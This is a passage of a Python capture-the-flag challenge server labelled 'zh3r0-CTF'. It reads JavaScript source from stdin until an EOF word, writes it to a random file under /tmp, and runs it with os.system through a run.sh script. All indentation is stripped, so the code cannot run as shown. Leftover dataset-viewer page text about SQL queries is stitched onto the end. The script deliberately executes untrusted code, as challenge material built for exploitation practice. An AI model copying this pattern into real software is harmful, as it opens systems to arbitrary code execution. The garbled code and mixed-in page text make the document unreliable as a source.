return '/tmp/' + binascii.hexlify(os.urandom(16)).decode('utf-8')
EOF = 'zh3r0-CTF'
MAX_SIZE = 10000
def main():
print(f'Give me the source code(size < {MAX_SIZE}). EOF word is `{EOF}\'')
sys.stdout.flush()
size = 0
code = ''
while True:
s = sys.stdin.readline()
size += len(s)
if size > MAX_SIZE:
print('too long')
sys.stdout.flush()
return False
idx = s.find(EOF)
if idx < 0:
code += s
else:
code += s[:idx]
break
filename = gen_filename() + ".js"
with open(filename, 'w') as f:
f.write(code)
os.close(1)
os.close(2)
os.system(f'./run.sh {filename}')
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.